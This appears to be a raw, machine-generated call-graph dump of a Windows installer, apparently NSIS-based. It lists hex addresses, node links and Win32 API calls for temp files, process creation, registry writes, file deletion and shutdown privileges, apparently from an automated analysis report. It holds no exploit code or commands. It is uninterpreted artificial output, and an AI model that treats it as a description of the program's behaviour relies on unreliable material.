4584 401420 4583->4584 4584->4549 5344 6d4318c7 5345 6d4318ea 5344->5345 5346 6d43191a GlobalFree 5345->5346 5347 6d43192c 5345->5347 5346->5347 5348 6d4312f6 2 API calls 5347->5348 5349 6d431aae GlobalFree GlobalFree 5348->5349 4585 401eca 4586 402c1c 21 API calls 4585->4586 4587 401ed0 4586->4587 4588 402c1c 21 API calls 4587->4588 4589 401edc 4588->4589 4590 401ef3 EnableWindow 4589->4590 4591 401ee8 ShowWindow 4589->4591 4592 402aca 4590->4592 4591->4592 4777 40174b 4778 402c3e 21 API calls 4777->4778 4779 401752 4778->4779 4783 405f60 4779->4783 4781 401759 4782 405f60 2 API calls 4781->4782 4782->4781 4784 405f6b GetTickCount GetTempFileNameA 4783->4784 4785 405f9c 4784->4785 4786 405f98 4784->4786 4785->4781 4786->4784 4786->4785 5353 6d4316c8 5354 6d4316f7 5353->5354 5355 6d431b28 18 API calls 5354->5355 5356 6d4316fe 5355->5356 5357 6d431711 5356->5357 5358 6d431705 5356->5358 5360 6d43171b 5357->5360 5361 6d431738 5357->5361 5359 6d4312f6 2 API calls 5358->5359 5364 6d43170f 5359->5364 5365 6d431572 3 API calls 5360->5365 5362 6d431762 5361->5362 5363 6d43173e 5361->5363 5367 6d431572 3 API calls 5362->5367 5366 6d4315e9 3 API calls 5363->5366 5368 6d431720 5365->5368 5369 6d431743 5366->5369 5367->5364 5370 6d4315e9 3 API calls 5368->5370 5371 6d4312f6 2 API calls 5369->5371 5372 6d431726 5370->5372 5373 6d431749 GlobalFree 5371->5373 5374 6d4312f6 2 API calls 5372->5374 5373->5364 5375 6d43175d GlobalFree 5373->5375 5376 6d43172c GlobalFree 5374->5376 5375->5364 5376->5364 5377 40194c 5378 402c3e 21 API calls 5377->5378 5379 401953 lstrlenA 5378->5379 5380 40262d 5379->5380 5381 4048d0 5382 4048fc 5381->5382 5383 40490d 5381->5383 5442 405a98 GetDlgItemTextA 5382->5442 5384 404919 GetDlgItem 5383->5384 5392 404978 5383->5392 5387 40492d 5384->5387 5386 404907 5389 406698 5 API calls 5386->5389 5390 404941 SetWindowTextA 5387->5390 5395 405dc9 4 API calls 5387->5395 5388 404a5c 5391 404c06 5388->5391 5444 405a98 GetDlgItemTextA 5388->5444 5389->5383 5396 40443e 22 API calls 5390->5396 5394 4044a5 8 API calls 5391->5394 5392->5388 5392->5391 5397 406431 21 API calls 5392->5397 5399 404c1a 5394->5399 5400 404937 5395->5400 5401 40495d 5396->5401 5402 4049ec SHBrowseForFolderA 5397->5402 5398 404a8c 5403 405e1e 18 API calls 5398->5403 5400->5390 5407 405d30 3 API calls 5400->5407 5404 40443e 22 API calls 5401->5404 5402->5388 5405 404a04 CoTaskMemFree 5402->5405 5406 404a92 5403->5406 5408 40496b 5404->5408 5409 405d30 3 API calls 5405->5409 5445 40639e lstrcpynA 5406->5445 5407->5390 5443 404473 SendMessageA 5408->5443 5411 404a11 5409->5411 5414 404a48 SetDlgItemTextA 5411->5414 5418 406431 21 API calls 5411->5418 5413 404971 5416 4067c6 5 API calls 5413->5416 5414->5388 5415 404aa9 5417 4067c6 5 API calls 5415->5417 5416->5392 5425 404ab0 5417->5425 5419 404a30 lstrcmpiA 5418->5419 5419->5414 5421 404a41 lstrcatA 5419->5421 5420 404aec 5446 40639e lstrcpynA 5420->5446 5421->5414 5423 404af3 5424 405dc9 4 API calls 5423->5424 5426 404af9 GetDiskFreeSpaceA 5424->5426 5425->5420 5429 405d77 2 API calls 5425->5429 5431 404b44 5425->5431 5428 404b1d MulDiv 5426->5428 5426->5431 5428->5431 5429->5425 5430 404bb5 5433 404bd8 5430->5433 5435 40140b 2 API calls 5430->5435 5431->5430 5432 404d4c 24 API calls 5431->5432 5434 404ba2 5432->5434 5447 404460 KiUserCallbackDispatcher 5433->5447 5436 404bb7 SetDlgItemTextA 5434->5436 5437 404ba7 5434->5437 5435->5433 5436->5430 5439 404c87 24 API calls 5437->5439 5439->5430 5440 404bf4 5440->5391 5448 404829 5440->5448 5442->5386 5443->5413 5444->5398 5445->5415 5446->5423 5447->5440 5449 404837 5448->5449 5450 40483c SendMessageA 5448->5450 5449->5450 5450->5391 5451 401fd0 5452 402c3e 21 API calls 5451->5452 5453 401fd7 5452->5453 5454 406731 2 API calls 5453->5454 5455 401fdd 5454->5455 5457 401fef 5455->5457 5458 4062fc wsprintfA 5455->5458 5458->5457 4816 4034d1 SetErrorMode GetVersionExA 4817 403523 GetVersionExA 4816->4817 4819 403562 4816->4819 4818 40353f 4817->4818 4817->4819 4818->4819 4820 4035e6 4819->4820 4821 4067c6 5 API calls 4819->4821 4822 406758 3 API calls 4820->4822 4821->4820 4823 4035fc lstrlenA 4822->4823 4823->4820 4824 40360c 4823->4824 4825 4067c6 5 API calls 4824->4825 4826 403613 4825->4826 4827 4067c6 5 API calls 4826->4827 4828 40361a 4827->4828 4829 4067c6 5 API calls 4828->4829 4830 403626 #17 OleInitialize SHGetFileInfoA 4829->4830 4905 40639e lstrcpynA 4830->4905 4833 403674 GetCommandLineA 4906 40639e lstrcpynA 4833->4906 4835 403686 4836 405d5b CharNextA 4835->4836 4837 4036ad CharNextA 4836->4837 4845 4036bc 4837->4845 4838 403782 4839 403796 GetTempPathA 4838->4839 4907 4034a0 4839->4907 4841 4037ae 4842 4037b2 GetWindowsDirectoryA lstrcatA 4841->4842 4843 403808 DeleteFileA 4841->4843 4846 4034a0 12 API calls 4842->4846 4917 402f61 GetTickCount GetModuleFileNameA 4843->4917 4844 405d5b CharNextA 4844->4845 4845->4838 4845->4844 4850 403784 4845->4850 4849 4037ce 4846->4849 4848 40381b 4853 4038a0 4848->4853 4857 405d5b CharNextA 4848->4857 4904 4038b0 4848->4904 4849->4843 4852 4037d2 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4849->4852 5003 40639e lstrcpynA 4850->5003 4855 4034a0 12 API calls 4852->4855 4947 403ba7 4853->4947 4859 403800 4855->4859 4860 403835 4857->4860 4859->4843 4859->4904 4869 40387a 4860->4869 4870 4038df 4860->4870 4861 403a21 4863 403a29 GetCurrentProcess OpenProcessToken 4861->4863 4864 403a9f ExitProcess 4861->4864 4862 4038ca 5029 405ab4 4862->5029 4867 403a40 LookupPrivilegeValueA AdjustTokenPrivileges 4863->4867 4868 403a6f 4863->4868 4867->4868 4872 4067c6 5 API calls 4868->4872 5004 405e1e 4869->5004 4874 405a1f 5 API calls 4870->4874 4875 403a76 4872->4875 4877 4038e4 lstrlenA 4874->4877 4878 403a8b ExitWindowsEx 4875->4878 4880 403a98 4875->4880 5033 40639e lstrcpynA 4877->5033 4878->4864 4878->4880 4883 40140b 2 API calls 4880->4883 4882 4038fc 4885 403914 4882->4885 5034 40639e lstrcpynA 4882->5034 4883->4864 4884 403895 5019 40639e lstrcpynA 4884->5019 4888 403932 wsprintfA 4885->4888 4901 403960 4885->4901 4889 406431 21 API calls 4888->4889 4889->4885 4890 4059a8 2 API calls 4890->4901 4891 405a02 2 API calls 4891->4901 4892 403970 GetFileAttributesA 4895 40397c DeleteFileA 4892->4895 4892->4901 4893 4039a8 SetCurrentDirectoryA 5075 406177 MoveFileExA 4893->5075 4895->4901 4898 406177 40 API calls 4898->4901 4899 406431 21 API calls 4899->4901 4900 405a37 2 API calls 4900->4901 4901->4885 4901->4888 4901->4890 4901->4891 4901->4892 4901->4893 4901->4898 4901->4899 4901->4900 4902 403a11 CloseHandle 4901->4902 4901->4904 5035 405b60 4901->5035 5079 406731 FindFirstFileA 4901->5079 4902->4904 5020 403ab5 4904->5020 4905->4833 4906->4835 4908 406698 5 API calls 4907->4908 4909 4034ac 4908->4909 4910 4034b6 4909->4910 5082 405d30 lstrlenA CharPrevA 4909->5082 4910->4841 4913 405a02 2 API calls 4914 4034c4 4913->4914 4915 405f60 2 API calls 4914->4915 4916 4034cf 4915->4916 4916->4841 5085 405f31 GetFileAttributesA CreateFileA 4917->5085 4919 402fa4 4946 402fb1 4919->4946 5086 40639e lstrcpynA 4919->5086 4921 402fc7 5087 405d77 lstrlenA 4921->5087 4925 402fd8 GetFileSize 4926 4030d2 4925->4926 4945 402fef 4925->4945 4927 402ec2 36 API calls 4926->4927 4928 4030db 4927->4928 4930 403117 GlobalAlloc 4928->4930 4928->4946 5093 403489 SetFilePointer 4928->5093 4929 403473 ReadFile 4929->4945 4933 40312e 4930->4933 4932 40316f 4934 402ec2 36 API calls 4932->4934 4937 405f60 2 API calls 4933->4937 4934->4946 4935 4030f8 4936 403473 ReadFile 4935->4936 4939 403103 4936->4939 4938 40313f CreateFileA 4937->4938 4941 403179 4938->4941 4938->4946 4939->4930 4939->4946 4940 402ec2 36 API calls 4940->4945 5092 403489 SetFilePointer 4941->5092 4943 403187 4944 403202 48 API calls 4943->4944 4944->4946 4945->4926 4945->4929 4945->4932 4945->4940 4945->4946 4946->4848 4948 4067c6 5 API calls 4947->4948 4949 403bbb 4948->4949 4950 403bc1 4949->4950 4951 403bd3 4949->4951 5102 4062fc wsprintfA 4950->5102 4952 406285 3 API calls 4951->4952 4953 403bfe 4952->4953 4955 403c1c lstrcatA 4953->4955 4957 406285 3 API calls 4953->4957 4956 403bd1 4955->4956 5094 403e6c 4956->5094 4957->4955 4960 405e1e 18 API calls 4961 403c4e 4960->4961 4962 403cd7 4961->4962 4964 406285 3 API calls 4961->4964 4963 405e1e 18 API calls 4962->4963 4965 403cdd 4963->4965 4966 403c7a 4964->4966 4967 403ced LoadImageA 4965->4967 4968 406431 21 API calls 4965->4968 4966->4962 4971 403c96 lstrlenA 4966->4971 4974 405d5b CharNextA 4966->4974 4969 403d93 4967->4969 4970 403d14 RegisterClassA 4967->4970 4968->4967 4973 40140b 2 API calls 4969->4973 4972 403d4a SystemParametersInfoA CreateWindowExA 4970->4972 5002 403d9d 4970->5002 4975 403ca4 lstrcmpiA 4971->4975 4976 403cca 4971->4976 4972->4969 4979 403d99 4973->4979 4977 403c94 4974->4977 4975->4976 4978 403cb4 GetFileAttributesA 4975->4978 4980 405d30 3 API calls 4976->4980 4977->4971 4982 403cc0 4978->4982 4983 403e6c 22 API calls 4979->4983 4979->5002 4981 403cd0 4980->4981 5103 40639e lstrcpynA 4981->5103 4982->4976 4986 405d77 2 API calls 4982->4986 4984 403daa 4983->4984 4987 403db6 ShowWindow 4984->4987 4988 403e39 4984->4988 4986->4976 4989 406758 3 API calls 4987->4989 4990 4055b4 5 API calls 4988->4990 4991 403dce 4989->4991 4992 403e3f 4990->4992 4995 403ddc GetClassInfoA 4991->4995 4997 406758 3 API calls 4991->4997 4993 403e43 4992->4993 4994 403e5b 4992->4994 5000 40140b 2 API calls 4993->5000 4993->5002 4996 40140b 2 API calls 4994->4996 4998 403df0 GetClassInfoA RegisterClassA 4995->4998 4999 403e06 DialogBoxParamA 4995->4999 4996->5002 4997->4995 4998->4999 5001 40140b 2 API calls 4999->5001 5000->5002 5001->5002 5002->4904 5003->4839 5105 40639e lstrcpynA 5004->5105 5006 405e2f 5007 405dc9 4 API calls 5006->5007 5008 405e35 5007->5008 5009 403886 5008->5009 5010 406698 5 API calls 5008->5010 5009->4904 5018 40639e lstrcpynA 5009->5018 5016 405e45 5010->5016 5011 405e70 lstrlenA 5012 405e7b 5011->5012 5011->5016 5013 405d30 3 API calls 5012->5013 5015 405e80 GetFileAttributesA 5013->5015 5014 406731 2 API calls 5014->5016 5015->5009 5016->5009 5016->5011 5016->5014 5017 405d77 2 API calls 5016->5017 5017->5011 5018->4884 5019->4853 5021 403ad0 5020->5021 5022 403ac6 CloseHandle 5020->5022 5023 403ae4 5021->5023 5024 403ada CloseHandle 5021->5024 5022->5021 5106 403b12 5023->5106 5024->5023 5027 405b60 71 API calls 5028 4038b8 OleUninitialize 5027->5028 5028->4861 5028->4862 5030 405ac9 5029->5030 5031 4038d7 ExitProcess 5030->5031 5032 405add MessageBoxIndirectA 5030->5032 5032->5031 5033->4882 5034->4885 5036 405e1e 18 API calls 5035->5036 5037 405b80 5036->5037 5038 405b88 DeleteFileA 5037->5038 5039 405b9f 5037->5039 5043 405ce3 5038->5043 5041 405cd7 5039->5041 5110 40639e lstrcpynA 5039->5110 5041->5043 5046 406731 2 API calls 5041->5046 5042 405bc5 5044 405bd8 5042->5044 5045 405bcb lstrcatA 5042->5045 5043->4901 5048 405d77 2 API calls 5044->5048 5047 405bde 5045->5047 5049 405cf1 5046->5049 5050 405bec lstrcatA 5047->5050 5052 405bf7 lstrlenA FindFirstFileA 5047->5052 5048->5047 5049->5043 5051 405cf5 5049->5051 5050->5052 5054 405d30 3 API calls 5051->5054 5053 405ccd 5052->5053 5073 405c1b 5052->5073 5053->5041 5056 405cfb 5054->5056 5055 405d5b CharNextA 5055->5073 5057 405b18 5 API calls 5056->5057 5058 405d07 5057->5058 5059 405d21 5058->5059 5060 405d0b 5058->5060 5061 4054e2 28 API calls 5059->5061 5060->5043 5065 4054e2 28 API calls 5060->5065 5061->5043 5062 405cac FindNextFileA 5064 405cc4 FindClose 5062->5064 5062->5073 5064->5053 5066 405d18 5065->5066 5068 406177 40 API calls 5066->5068 5069 405d1f 5068->5069 5069->5043 5070 405b60 64 API calls 5070->5073 5071 4054e2 28 API calls 5071->5062 5072 4054e2 28 API calls 5072->5073 5073->5055 5073->5062 5073->5070 5073->5071 5073->5072 5074 406177 40 API calls 5073->5074 5111 40639e lstrcpynA 5073->5111 5112 405b18 5073->5112 5074->5073 5076 4039b7 CopyFileA 5075->5076 5077 40618b 5075->5077 5076->4901 5076->4904 5123 406007 5077->5123 5080 406752 5079->5080 5081 406747 FindClose 5079->5081 5080->4901 5081->5080 5083 4034be 5082->5083 5084 405d4a lstrcatA 5082->5084 5083->4913 5084->5083 5085->4919 5086->4921 5088 405d84 5087->5088 5089 402fcd 5088->5089 5090 405d89 CharPrevA 5088->5090 5091 40639e lstrcpynA 5089->5091 5090->5088 5090->5089 5091->4925 5092->4943 5093->4935 5095 403e80 5094->5095 5104 4062fc wsprintfA 5095->5104 5097 403ef1 5098 403f25 22 API calls 5097->5098 5100 403ef6 5098->5100 5099 403c2c 5099->4960 5100->5099 5101 406431 21 API calls 5100->5101 5101->5100 5102->4956 5103->4962 5104->5097 5105->5006 5107 403b20 5106->5107 5108 403ae9 5107->5108 5109 403b25 FreeLibrary GlobalFree 5107->5109 5108->5027 5109->5108 5109->5109 5110->5042 5111->5073 5120 405f0c GetFileAttributesA 5112->5120 5115 405b33 RemoveDirectoryA 5117 405b41 5115->5117 5116 405b3b DeleteFileA 5116->5117 5118 405b45 5117->5118 5119 405b51 SetFileAttributesA 5117->5119 5118->5073 5119->5118 5121 405b24 5120->5121 5122 405f1e SetFileAttributesA 5120->5122 5121->5115 5121->5116 5121->5118 5122->5121 5124 406053 GetShortPathNameA 5123->5124 5125 40602d 5123->5125 5126 406172 5124->5126 5127 406068 5124->5127 5150 405f31 GetFileAttributesA CreateFileA 5125->5150 5126->5076 5127->5126 5130 406070 wsprintfA 5127->5130 5129 406037 CloseHandle GetShortPathNameA 5129->5126 5131 40604b 5129->5131 5132 406431 21 API calls 5130->5132 5131->5124 5131->5126 5133 406098 5132->5133 5151 405f31 GetFileAttributesA CreateFileA 5133->5151 5135 4060a5 5135->5126 5136 4060b4 GetFileSize GlobalAlloc 5135->5136 5137 4060d6 5136->5137 5138 40616b CloseHandle 5136->5138 5139 405fa9 ReadFile 5137->5139 5138->5126 5140 4060de 5139->5140 5140->5138 5152 405e96 lstrlenA 5140->5152 5143 4060f5 lstrcpyA 5146 406117 5143->5146 5144 406109 5145 405e96 4 API calls 5144->5145 5145->5146 5147 40614e SetFilePointer 5146->5147 5148 405fd8 WriteFile 5147->5148 5149 406164 GlobalFree 5148->5149 5149->5138 5150->5129 5151->5135 5153 405ed7 lstrlenA 5152->5153 5154 405eb0 lstrcmpiA 5153->5154 5155 405edf 5153->5155 5154->5155 5156 405ece CharNextA 5154->5156 5155->5143 5155->5144 5156->5153 5459 405456 5460 405466 5459->5460 5461 40547a 5459->5461 5462 40546c 5460->5462 5471 4054c3 5460->5471 5463 405482 IsWindowVisible 5461->5463 5467 405499 5461->5467 5465 40448a SendMessageA 5462->5465 5466 40548f 5463->5466 5463->5471 5464 4054c8 CallWindowProcA 5468 405476 5464->5468 5465->5468 5469 404d91 5 API calls 5466->5469 5467->5464 5470 404e11 4 API calls 5467->5470 5469->5467 5470->5471 5471->5464 5472 4014d6 5473 402c1c 21 API calls 5472->5473 5474 4014dc Sleep 5473->5474 5476 402aca 5474->5476 5484 6d431058 5485 6d431074 5484->5485 5486 6d4310dc 5485->5486 5488 6d431091 5485->5488 5497 6d43154b 5485->5497 5489 6d43154b GlobalFree 5488->5489 5490 6d4310a1 5489->5490 5491 6d4310b1 5490->5491 5492 6d4310a8 GlobalSize 5490->5492 5493 6d4310c6 5491->5493 5494 6d4310b5 GlobalAlloc 5491->5494 5492->5491 5496 6d4310d1 GlobalFree 5493->5496 5495 6d431572 3 API calls 5494->5495 5495->5493 5496->5486 5499 6d431551 5497->5499 5498 6d431557 5498->5488 5499->5498 5500 6d431563 GlobalFree 5499->5500 5500->5488 5202 40175e 5203 402c3e 21 API calls 5202->5203 5204 401765 5203->5204 5205 401783 5204->5205 5206 40178b 5204->5206 5242 40639e lstrcpynA 5205->5242 5243 40639e lstrcpynA 5206->5243 5209 401789 5213 406698 5 API calls 5209->5213 5210 401796 5211 405d30 3 API calls 5210->5211 5212 40179c lstrcatA 5211->5212 5212->5209 5220 4017a8 5213->5220 5214 4017e9 5216 405f0c 2 API calls 5214->5216 5215 406731 2 API calls 5215->5220 5216->5220 5218 4017bf CompareFileTime 5218->5220 5219 401883 5221 4054e2 28 API calls 5219->5221 5220->5214 5220->5215 5220->5218 5220->5219 5228 406431 21 API calls 5220->5228 5232 40639e lstrcpynA 5220->5232 5237 405ab4 MessageBoxIndirectA 5220->5237 5238 40185a 5220->5238 5241 405f31 GetFileAttributesA CreateFileA 5220->5241 5223 40188d 5221->5223 5222 4054e2 28 API calls 5239 40186f 5222->5239 5224 403202 48 API calls 5223->5224 5225 4018a0 5224->5225 5226 4018b4 SetFileTime 5225->5226 5227 4018c6 CloseHandle 5225->5227 5226->5227 5229 4018d7 5227->5229 5227->5239 5228->5220 5230 4018dc 5229->5230 5231 4018ef 5229->5231 5233 406431 21 API calls 5230->5233 5234 406431 21 API calls 5231->5234 5232->5220 5235 4018e4 lstrcatA 5233->5235 5236 4018f7 5234->5236 5235->5236 5236->5239 5240 405ab4 MessageBoxIndirectA 5236->5240 5237->5220 5238->5222 5238->5239 5240->5239 5241->5220 5242->5209 5243->5210 5501 40165e 5502 402c3e 21 API calls 5501->5502 5503 401664 5502->5503 5504 406731 2 API calls 5503->5504 5505 40166a 5504->5505 5506 40195e 5507 402c1c 21 API calls 5506->5507 5508 401965 5507->5508 5509 402c1c 21 API calls 5508->5509 5510 401972 5509->5510 5511 402c3e 21 API calls 5510->5511 5512 401989 lstrlenA 5511->5512 5514 401999 5512->5514 5513 4019d9 5514->5513 5518 40639e lstrcpynA 5514->5518 5516 4019c9 5516->5513 5517 4019ce lstrlenA 5516->5517 5517->5513 5518->5516 5519 6d431661 5520 6d43154b GlobalFree 5519->5520 5523 6d431679 5520->5523 5521 6d4316bf GlobalFree 5522 6d431694 5522->5521 5523->5521 5523->5522 5524 6d4316ab VirtualFree 5523->5524 5524->5521 5525 401a63 5526 402c1c 21 API calls 5525->5526 5527 401a6c 5526->5527 5528 402c1c 21 API calls 5527->5528 5529 401a13 5528->5529 5530 6d4310e0 5536 6d431110 5530->5536 5531 6d43129a GlobalFree 5532 6d4311cd GlobalAlloc 5532->5536 5533 6d431286 GlobalFree 5533->5536 5534 6d43133d 2 API calls 5534->5536 5535 6d431295 5535->5531 5536->5531 5536->5532 5536->5533 5536->5534 5536->5535 5537 6d4312f6 2 API calls 5536->5537 5538 6d431165 GlobalAlloc 5536->5538 5539 6d431361 lstrcpyA 5536->5539 5537->5536 5538->5536 5539->5536 5540 403b65 5541 403b70 5540->5541 5542 403b77 GlobalAlloc 5541->5542 5543 403b74 5541->5543 5542->5543 5544 401568 5545 402a47 5544->5545 5548 4062fc wsprintfA 5545->5548 5547 402a4c 5548->5547 5549 401b68 5550 402c3e 21 API calls 5549->5550 5551 401b6f 5550->5551 5552 402c1c 21 API calls 5551->5552 5553 401b78 wsprintfA 5552->5553 5554 402aca 5553->5554 5555 6d4322ea 5556 6d432354 5555->5556 5557 6d43235f GlobalAlloc 5556->5557 5558 6d43237e 5556->5558 5557->5556 5559 401d6a 5560 401d70 5559->5560 5561 401d7d GetDlgItem 5559->5561 5562 402c1c 21 API calls 5560->5562 5563 401d77 5561->5563 5562->5563 5564 401dbe GetClientRect LoadImageA SendMessageA 5563->5564 5566 402c3e 21 API calls 5563->5566 5567 401e1f 5564->5567 5569 401e2b 5564->5569 5566->5564 5568 401e24 DeleteObject 5567->5568 5567->5569 5568->5569 5570 40276b 5571 402771 5570->5571 5572 402779 FindClose 5571->5572 5573 402aca 5571->5573 5572->5573 5574 4023ed 5575 402c3e 21 API calls 5574->5575 5576 4023fe 5575->5576 5577 402c3e 21 API calls 5576->5577 5578 402407 5577->5578 5579 402c3e 21 API calls 5578->5579 5580 402411 GetPrivateProfileStringA 5579->5580 5581 4027ed 5582 402c3e 21 API calls 5581->5582 5583 4027f9 5582->5583 5584 40280f 5583->5584 5585 402c3e 21 API calls 5583->5585 5586 405f0c 2 API calls 5584->5586 5585->5584 5587 402815 5586->5587 5609 405f31 GetFileAttributesA CreateFileA 5587->5609 5589 402822 5590 4028de 5589->5590 5593 4028c6 5589->5593 5594 40283d GlobalAlloc 5589->5594 5591 4028e5 DeleteFileA 5590->5591 5592 4028f8 5590->5592 5591->5592 5596 403202 48 API calls 5593->5596 5594->5593 5595 402856 5594->5595 5610 403489 SetFilePointer 5595->5610 5598 4028d3 CloseHandle 5596->5598 5598->5590 5599 40285c 5600 403473 ReadFile 5599->5600 5601 402865 GlobalAlloc 5600->5601 5602 402875 5601->5602 5603 4028af 5601->5603 5604 403202 48 API calls 5602->5604 5605 405fd8 WriteFile 5603->5605 5608 402882 5604->5608 5606 4028bb GlobalFree 5605->5606 5606->5593 5607 4028a6 GlobalFree 5607->5603 5608->5607 5609->5589 5610->5599 5611 40166f 5612 402c3e 21 API calls 5611->5612 5613 401676 5612->5613 5614 402c3e 21 API calls 5613->5614 5615 40167f 5614->5615 5616 402c3e 21 API calls 5615->5616 5617 401688 MoveFileA 5616->5617 5618 401694 5617->5618 5619 40169b 5617->5619 5620 401423 28 API calls 5618->5620 5621 406731 2 API calls 5619->5621 5623 4022ef 5619->5623 5620->5623 5622 4016aa 5621->5622 5622->5623 5624 406177 40 API calls 5622->5624 5624->5618 5632 6d432c73 5633 6d432c8b 5632->5633 5634 6d4315c4 2 API calls 5633->5634 5635 6d432ca6 5634->5635 5643 4019f2 5644 402c3e 21 API calls 5643->5644 5645 4019f9 5644->5645 5646 402c3e 21 API calls 5645->5646 5647 401a02 5646->5647 5648 401a09 lstrcmpiA 5647->5648 5649 401a1b lstrcmpA 5647->5649 5650 401a0f 5648->5650 5649->5650 5160 401574 5161 401584 ShowWindow 5160->5161 5162 40158b 5160->5162 5161->5162 5163 401599 ShowWindow 5162->5163 5164 402aca 5162->5164 5163->5164 5651 404574 lstrcpynA lstrlenA 5652 4014f4 SetForegroundWindow 5653 402aca 5652->5653 5661 402178 5662 402c3e 21 API calls 5661->5662 5663 40217f 5662->5663 5664 402c3e 21 API calls 5663->5664 5665 402189 5664->5665 5666 402c3e 21 API calls 5665->5666 5667 402193 5666->5667 5668 402c3e 21 API calls 5667->5668 5669 4021a0 5668->5669 5670 402c3e 21 API calls 5669->5670 5671 4021aa 5670->5671 5672 4021ec CoCreateInstance 5671->5672 5673 402c3e 21 API calls 5671->5673 5676 40220b 5672->5676 5678 4022b9 5672->5678 5673->5672 5674 401423 28 API calls 5675 4022ef 5674->5675 5677 402299 MultiByteToWideChar 5676->5677 5676->5678 5677->5678 5678->5674 5678->5675 5679 4022f8 5680 402c3e 21 API calls 5679->5680 5681 4022fe 5680->5681 5682 402c3e 21 API calls 5681->5682 5683 402307 5682->5683 5684 402c3e 21 API calls 5683->5684 5685 402310 5684->5685 5686 406731 2 API calls 5685->5686 5687 402319 5686->5687 5688 40232a lstrlenA lstrlenA 5687->5688 5692 40231d 5687->5692 5690 4054e2 28 API calls 5688->5690 5689 4054e2 28 API calls 5693 402325 5689->5693 5691 402366 SHFileOperationA 5690->5691 5691->5692 5691->5693 5692->5689 5692->5693 5192 40267a 5193 402c1c 21 API calls 5192->5193 5198 402684 5193->5198 5194 4026f2 5195 405fa9 ReadFile 5195->5198 5196 4026f4 5201 4062fc wsprintfA 5196->5201 5197 402704 5197->5194 5200 40271a SetFilePointer 5197->5200 5198->5194 5198->5195 5198->5196 5198->5197 5200->5194 5201->5194 5694 40237a 5695 402381 5694->5695 5698 402394 5694->5698 5696 406431 21 API calls 5695->5696 5697 40238e 5696->5697 5697->5698 5699 405ab4 MessageBoxIndirectA 5697->5699 5699->5698 5700 4029fb 5701 402a02 5700->5701 5702 402a4e 5700->5702 5705 402a4c 5701->5705 5706 402c1c 21 API calls 5701->5706 5703 4067c6 5 API calls 5702->5703 5704 402a55 5703->5704 5707 402c3e 21 API calls 5704->5707 5708 402a10 5706->5708 5709 402a5e 5707->5709 5710 402c1c 21 API calls 5708->5710 5709->5705 5718 4063f1 5709->5718 5712 402a1f 5710->5712 5717 4062fc wsprintfA 5712->5717 5714 402a6c 5714->5705 5722 4063db 5714->5722 5717->5705 5719 4063fc 5718->5719 5720 40641f IIDFromString 5719->5720 5721 406418 5719->5721 5720->5714 5721->5714 5725 4063c0 WideCharToMultiByte 5722->5725 5724 402a8d CoTaskMemFree 5724->5705 5725->5724 5726 401efe 5727 402c3e 21 API calls 5726->5727 5728 401f04 5727->5728 5729 402c3e 21 API calls 5728->5729 5730 401f0d 5729->5730 5731 402c3e 21 API calls 5730->5731 5732 401f16 5731->5732 5733 402c3e 21 API calls 5732->5733 5734 401f1f 5733->5734 5735 401423 28 API calls 5734->5735 5736 401f26 5735->5736 5743 405a7a ShellExecuteExA 5736->5743 5738 4027cd 5739 401f61 5739->5738 5740 40683b 5 API calls 5739->5740 5741 401f7b CloseHandle 5740->5741 5741->5738 5743->5739 4365 401f80 4366 402c3e 21 API calls 4365->4366 4367 401f86 4366->4367 4368 4054e2 28 API calls 4367->4368 4369 401f90 4368->4369 4380 405a37 CreateProcessA 4369->4380 4372 401fb7 CloseHandle 4376 4027cd 4372->4376 4375 401fab 4377 401fb0 4375->4377 4378 401fb9 4375->4378 4388 4062fc wsprintfA 4377->4388 4378->4372 4381 401f96 4380->4381 4382 405a6a CloseHandle 4380->4382 4381->4372 4381->4376 4383 40683b WaitForSingleObject 4381->4383 4382->4381 4384 406855 4383->4384 4385 406867 GetExitCodeProcess 4384->4385 4389 406802 4384->4389 4385->4375 4388->4372 4390 40681f PeekMessageA 4389->4390 4391 406815 DispatchMessageA 4390->4391 4392 40682f WaitForSingleObject 4390->4392 4391->4390 4392->4384 5744 401000 5745 401037 BeginPaint GetClientRect 5744->5745 5747 40100c DefWindowProcA 5744->5747 5748 4010f3 5745->5748 5749 401179 5747->5749 5750 401073 CreateBrushIndirect FillRect DeleteObject 5748->5750 5751 4010fc 5748->5751 5750->5748 5752 401102 CreateFontIndirectA 5751->5752 5753 401167 EndPaint 5751->5753 5752->5753 5754 401112 6 API calls 5752->5754 5753->5749 5754->5753 5755 402000 5756 402c3e 21 API calls 5755->5756 5757 402007 5756->5757 5758 4067c6 5 API calls 5757->5758 5759 402016 5758->5759 5760 40202e GlobalAlloc 5759->5760 5761 40209e 5759->5761 5760->5761 5762 402042 5760->5762 5763 4067c6 5 API calls 5762->5763 5764 402049 5763->5764 5765 4067c6 5 API calls 5764->5765 5766 402053 5765->5766 5766->5761 5770 4062fc wsprintfA 5766->5770 5768 40208e 5771 4062fc wsprintfA 5768->5771 5770->5768 5771->5761 5772 401902 5773 401939 5772->5773 5774 402c3e 21 API calls 5773->5774 5775 40193e 5774->5775 5776 405b60 71 API calls 5775->5776 5777 401947 5776->5777 5778 401502 5779 401507 5778->5779 5781 40151f 5778->5781 5780 402c1c 21 API calls 5779->5780 5780->5781 4414 402483 4415 402c3e 21 API calls 4414->4415 4416 402495 4415->4416 4417 402c3e 21 API calls 4416->4417 4418 40249f 4417->4418 4431 402cce 4418->4431 4421 402aca 4422 4024d4 4423 4024e0 4422->4423 4435 402c1c 4422->4435 4426 402502 RegSetValueExA 4423->4426 4438 403202 4423->4438 4424 402c3e 21 API calls 4427 4024cd lstrlenA 4424->4427 4429 402518 RegCloseKey 4426->4429 4427->4422 4429->4421 4432 402ce9 4431->4432 4453 406252 4432->4453 4436 406431 21 API calls 4435->4436 4437 402c31 4436->4437 4437->4423 4439 403211 SetFilePointer 4438->4439 4440 40322d 4438->4440 4439->4440 4457 40330a GetTickCount 4440->4457 4445 40330a 46 API calls 4446 403264 4445->4446 4447 4032ca 4446->4447 4448 4032d0 ReadFile 4446->4448 4449 403273 4446->4449 4447->4426 4448->4447 4449->4447 4451 405fa9 ReadFile 4449->4451 4472 405fd8 WriteFile 4449->4472 4451->4449 4454 406261 4453->4454 4455 4024af 4454->4455 4456 40626c RegCreateKeyExA 4454->4456 4455->4421 4455->4422 4455->4424 4456->4455 4458 403462 4457->4458 4459 403338 4457->4459 4460 402ec2 36 API calls 4458->4460 4474 403489 SetFilePointer 4459->4474 4468 403234 4460->4468 4462 403343 SetFilePointer 4466 403368 4462->4466 4467 405fd8 WriteFile 4466->4467 4466->4468 4469 403443 SetFilePointer 4466->4469 4475 403473 4466->4475 4478 40690b 4466->4478 